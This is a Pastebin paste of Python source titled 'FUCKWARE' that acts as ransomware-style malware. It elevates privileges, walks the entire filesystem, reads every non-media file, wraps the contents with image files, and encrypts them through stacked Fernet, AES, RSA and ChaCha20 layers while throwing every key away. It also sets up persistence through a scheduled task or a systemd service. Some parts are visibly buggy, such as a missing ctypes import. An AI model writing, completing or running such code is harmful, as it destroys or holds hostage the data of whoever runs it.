WhosYourDaddySec

FUCKWARE

Oct 17th, 2024
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.54 KB | None | 0 0
  1. import os
  2. import sys
  3. import subprocess
  4. import base64
  5. import random
  6. import hashlib
  7. from cryptography.fernet import Fernet
  8. from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
  9. from cryptography.hazmat.backends import default_backend
  10. import rsa
  11. from PIL import Image
  12. from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
  13. def install_dependencies():
  14.     try:
  15.         import cryptography
  16.         import rsa
  17.         import PIL
  18.     except ImportError:
  19.         # Install necessary libraries
  20.         subprocess.call([sys.executable, '-m', 'pip', 'install', 'cryptography', 'rsa', 'Pillow'])
  21. def elevate_permissions():
  22.     if os.name == 'nt':
  23.         try:
  24.             is_admin = os.getuid() == 0
  25.         except AttributeError:
  26.             is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
  27.         if not is_admin:
  28.             ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, ' '.join(sys.argv), None, 1)
  29.             sys.exit(0)
  30.     else:
  31.         if os.geteuid() != 0:
  32.             subprocess.call(['sudo', 'python3'] + sys.argv)
  33.             sys.exit(0)
  34. def generate_random_key():
  35.     return Fernet.generate_key()
  36. def fernet_encrypt(data, key):
  37.     cipher = Fernet(key)
  38.     return cipher.encrypt(data)
  39. def aes_256_cbc_encrypt(data, key):
  40.     iv = os.urandom(16)
  41.     cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
  42.     encryptor = cipher.encryptor()
  43.     padding_length = 16 - (len(data) % 16)
  44.     data += bytes([padding_length]) * padding_length
  45.     return iv + encryptor.update(data) + encryptor.finalize()
  46. def rsa_encrypt(data):
  47.     (pubkey, privkey) = rsa.newkeys(2048)
  48.     return rsa.encrypt(data, pubkey), privkey
  49. def chacha20_encrypt(data, key, nonce):
  50.     cipher = Cipher(algorithms.ChaCha20(key, nonce), mode=None, backend=default_backend())
  51.     encryptor = cipher.encryptor()
  52.     return encryptor.update(data)
  53. def sha256_hash(data):
  54.     return hashlib.sha256(data).hexdigest()
  55. def base64_encode(data):
  56.     return base64.b64encode(data)
  57. def bind_file_to_image(image_path, file_data):
  58.     image = Image.open(image_path)
  59.     img_bytes = image.tobytes()
  60.     combined_data = img_bytes + file_data
  61.     return combined_data
  62. def scan_drives_for_files():
  63.     media_files = []
  64.     non_media_files = []
  65.     for root, _, files in os.walk('C:\\' if os.name == 'nt' else '/'):
  66.         for file in files:
  67.             if file.lower().endswith(('.png', '.jpg', '.jpeg', '.gif', '.bmp', '.mp4', '.avi', '.mkv', '.mp3', '.wav')):
  68.                 media_files.append(os.path.join(root, file))
  69.             else:
  70.                 non_media_files.append(os.path.join(root, file))
  71.     return media_files, non_media_files
  72. def divide_files_among_images(media_files, non_media_files):
  73.     num_media_files = len(media_files)
  74.     if num_media_files == 0:
  75.         return []
  76.    
  77.     chunk_size = len(non_media_files) // num_media_files
  78.     remainder = len(non_media_files) % num_media_files
  79.     chunks = []
  80.     start = 0
  81.     for i in range(num_media_files):
  82.         end = start + chunk_size + (1 if i < remainder else 0)
  83.         chunks.append((media_files[i], non_media_files[start:end]))
  84.         start = end
  85.     return chunks
  86. def bind_and_encrypt_files():
  87.     media_files, non_media_files = scan_drives_for_files()
  88.     chunks = divide_files_among_images(media_files, non_media_files)
  89.    
  90.     os.makedirs('encrypted_images', exist_ok=True)
  91.     for media_file, file_chunk in chunks:
  92.         combined_data = b""
  93.         for file_path in file_chunk:
  94.             with open(file_path, 'rb') as f:
  95.                 file_data = f.read()
  96.                 combined_data += file_data
  97.         combined_data = bind_file_to_image(media_file, combined_data)
  98.         random_key = generate_random_key()
  99.         encrypted_data = fernet_encrypt(combined_data, random_key)
  100.         aes_key = os.urandom(32)
  101.         encrypted_aes_data = aes_256_cbc_encrypt(encrypted_data, aes_key)
  102.         encrypted_rsa_data, priv_key = rsa_encrypt(aes_key)
  103.         chacha_key = os.urandom(32)
  104.         nonce = os.urandom(16)
  105.         encrypted_chacha20_data = chacha20_encrypt(encrypted_aes_data, chacha_key, nonce)
  106.         sha256_checksum = sha256_hash(encrypted_chacha20_data)
  107.         final_data = base64_encode(encrypted_chacha20_data)
  108.         output_file = os.path.join('encrypted_images', f'encrypted_{os.path.basename(media_file)}')
  109.         with open(output_file, 'wb') as out_file:
  110.             out_file.write(final_data)
  111. def install_tool():
  112.     script_path = os.path.realpath(sys.argv[0])
  113.     if os.name == 'nt':
  114.         subprocess.call([
  115.             'schtasks', '/create', '/tn', 'AutoEncryptTool', '/tr', f'"{sys.executable} {script_path}"',
  116.             '/sc', 'onlogon', '/rl', 'highest', '/f'
  117.         ])
  118.     else:
  119.         service_content = f"""
  120.        [Unit]
  121.        Description=Auto Execute File Binder and Encryptor
  122.        After=network.target
  123.        [Service]
  124.        ExecStart=/usr/bin/python3 {script_path}
  125.        Restart=on-failure
  126.        [Install]
  127.        WantedBy=multi-user.target
  128.        """
  129.         service_path = '/etc/systemd/system/auto_encrypt.service'
  130.         with open(service_path, 'w') as service_file:
  131.             service_file.write(service_content)
  132.        
  133.         subprocess.call(['systemctl', 'daemon-reload'])
  134.         subprocess.call(['systemctl', 'enable', 'auto_encrypt.service'])
  135.         subprocess.call(['systemctl', 'start', 'auto_encrypt.service'])
  136. if __name__ == '__main__':
  137.     install_dependencies()
  138.     elevate_permissions()
  139.     bind_and_encrypt_files()
  140.     install_tool()
Add Comment
Please, Sign In to add comment